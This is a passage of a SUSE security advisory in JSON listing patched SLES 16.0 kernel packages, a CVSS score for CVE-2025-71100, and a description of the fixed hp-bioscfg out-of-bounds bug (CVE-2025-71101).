"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71100"
},
{
"cve": "CVE-2025-71101",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71101"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing\n\nThe hp_populate_*_elements_from_package() functions in the hp-bioscfg\ndriver contain out-of-bounds array access vulnerabilities.\n\nThese functions parse ACPI packages into internal data structures using\na for loop with index variable \u0027elem\u0027 that iterates through\nenum_obj/integer_obj/order_obj/password_obj/string_obj arrays.\n\nWhen processing multi-element fields like PREREQUISITES and\nENUM_POSSIBLE_VALUES, these functions read multiple consecutive array\nelements using expressions like \u0027enum_obj[elem + reqs]\u0027 and\n\u0027enum_obj[elem + pos_values]\u0027 within nested loops.\n\nThe bug is that the bounds check only validated elem, but did not consider\nthe additional offset when accessing elem + reqs or elem + pos_values.\n\nThe fix changes the bounds check to validate the actual accessed index.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
